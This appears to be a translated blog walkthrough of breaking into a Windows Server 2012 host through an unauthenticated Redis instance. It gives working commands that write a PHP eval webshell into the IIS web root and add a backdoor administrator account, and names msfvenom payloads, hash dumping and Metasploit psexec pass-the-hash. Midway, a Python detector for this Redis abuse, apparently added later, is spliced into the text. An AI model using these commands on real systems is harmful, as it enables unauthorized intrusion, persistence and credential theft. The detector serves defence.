Quickly compromising a Windows Server 2012 host via Redis

1. Scan for the Redis port

MacPC:~ liuxin$ nmap -Pn -p6379 -sV XXX.XXX.XX.0/24 --open

Starting Nmap 6.47 ( https://nmap.org ) at 2015-07-15 21:33 CST
Nmap scan report for XXX.XXX.XXX.XXX
Host is up (0.088s latency).
PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 2.4.5

2. Connect to Redis remotely

root@kaliPC:~# redis-cli -h XXX.XXX.XX.XX -p 6379
redis XXX.XXX.XXX.XX:6379> info
redis_version:2.4.5
redis_git_sha1:00000000
redis_git_dirty:0
arch_bits:32
multiplexing_api:winsock2
process_id:3640
uptime_in_seconds:1765597
uptime_in_days:20
lru_clock:1090432
used_cpu_sys:317.17
used_cpu_user:43.66
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
connected_clients:3
connected_slaves:0
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:1
used_memory:696880
used_memory_human:680.55K
used_memory_rss:696880
used_memory_peak:712564
used_memory_peak_human:695.86K
mem_fragmentation_ratio:1.00
mem_allocator:libc
loading:0
aof_enabled:0
changes_since_last_save:-2
bgsave_in_progress:0
last_save_time:1436865824
bgrewriteaof_in_progress:0
total_connections_received:79
total_commands_processed:767067
expired_keys:0
evicted_keys:0
keyspace_hits:10
keyspace_misses:354108
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
vm_enabled:0
role:master


3. Find the web root path and determine the OS type


4. Write a one-line webshell through Redis commands

redis XXX.XXX.XXX.XX:6379> config set dir C:\inetpub\wwwroot\
OK
redis XXX.XXX.XXX.XX:6379> config set dbfilename test.php
OK
redis XXX.XXX.XXX.XX:6379> set fuck "<?php @eval($_POST[123]);?>"
OK
redis XXX.XXX.XXX.XX:6379> save
OK
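As a defensive counterpart to the sequence above (an added example, not part of the original write-up), the following Python detector reads redis-cli MONITOR output and alerts when one client points `dir` at a web root or `dbfilename` at a script name and then forces a dump with SAVE/BGSAVE. It assumes the Redis 2.6+ MONITOR line format (which includes the client address); the sample capture, addresses and path lists are constructed.

```python
import re
from collections import defaultdict

# One redis-cli MONITOR line (Redis 2.6+ format): <unix_ts> [<db> <ip:port>] "cmd" "arg" ...
MONITOR_LINE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')
QUOTED_ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')
# A dbfilename with a script extension, or a dir under a web root / auto-executing path,
# turns the RDB dump into code the server will run (constructed pattern lists).
SCRIPT_EXT = re.compile(r'\.(php|asp|aspx|jsp|cgi|pl|py|sh)$', re.I)
SENSITIVE_DIR = re.compile(r'(inetpub|wwwroot|htdocs|/var/www|\.ssh|cron\.d|startup)', re.I)
CHECKS = (('dir', SENSITIVE_DIR), ('dbfilename', SCRIPT_EXT))

def parse_monitor_line(line):
    """Return {'ts', 'client', 'args'} for a MONITOR line, or None if it does not parse."""
    m = MONITOR_LINE.match(line.strip())
    if not m:
        return None
    # MONITOR escapes quotes and backslashes inside arguments; undo that.
    args = [a.replace('\\"', '"').replace('\\\\', '\\') for a in QUOTED_ARG.findall(m.group('args'))]
    return {'ts': float(m.group('ts')), 'client': m.group('client'), 'args': args}

def detect_rdb_write_abuse(lines):
    """Alert once per client that retargets dir/dbfilename to a risky value and then
    forces a dump with SAVE or BGSAVE."""
    pending = defaultdict(dict)   # client -> {'dir': ..., 'dbfilename': ...} since last dump
    alerts = []
    for line in lines:
        ev = parse_monitor_line(line)
        if not ev or not ev['args']:
            continue
        args, st = ev['args'], pending[ev['client']]
        cmd = args[0].lower()
        if cmd == 'config' and len(args) >= 4 and args[1].lower() == 'set' \
                and args[2].lower() in ('dir', 'dbfilename'):
            st[args[2].lower()] = args[3]
        elif cmd in ('save', 'bgsave'):
            reasons = ['%s set to %r' % (k, st[k]) for k, rx in CHECKS if rx.search(st.get(k, ''))]
            if reasons:
                alerts.append({'ts': ev['ts'], 'client': ev['client'], 'reasons': reasons})
            pending[ev['client']] = {}   # the dump happened; start tracking a fresh sequence
    return alerts

# Constructed MONITOR capture modelled on the write-up's session; addresses and the stored
# value are made up, and the second client is a benign administrator saving to the normal dir.
SAMPLE_MONITOR = """\
1436865801.202 [0 203.0.113.7:51234] "config" "set" "dir" "C:\\\\inetpub\\\\wwwroot\\\\"
1436865802.303 [0 203.0.113.7:51234] "config" "set" "dbfilename" "test.php"
1436865803.404 [0 203.0.113.7:51234] "set" "k" "payload-omitted"
1436865804.505 [0 203.0.113.7:51234] "save"
1436865805.606 [0 10.0.0.12:40000] "config" "set" "dir" "/var/lib/redis"
1436865806.707 [0 10.0.0.12:40000] "save"
""".splitlines()
```

Feed it `redis-cli MONITOR` output (or a saved capture) and each alert names the client, the time of the SAVE and which of the two settings were suspicious.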

5. Connect to the one-line webshell with China Chopper (菜刀)

6. Upload a full-featured webshell (大马), find the MySQL install path, and start privilege escalation

7. Create a new user and add it to the administrators group

net user test test /add

net localgroup administrators test /add

8. Log in remotely

9. Generate a payload with msfvenom

10. Upload it to the server and run the exe with administrator privileges

11. Dump password hashes

12. Cracking the administrator password failed

13. Since the hashes have already been obtained, we can log in as administrator without cracking them

msf > use exploit/windows/smb/psexec


© 走过岁月...... | Powered by LOFTER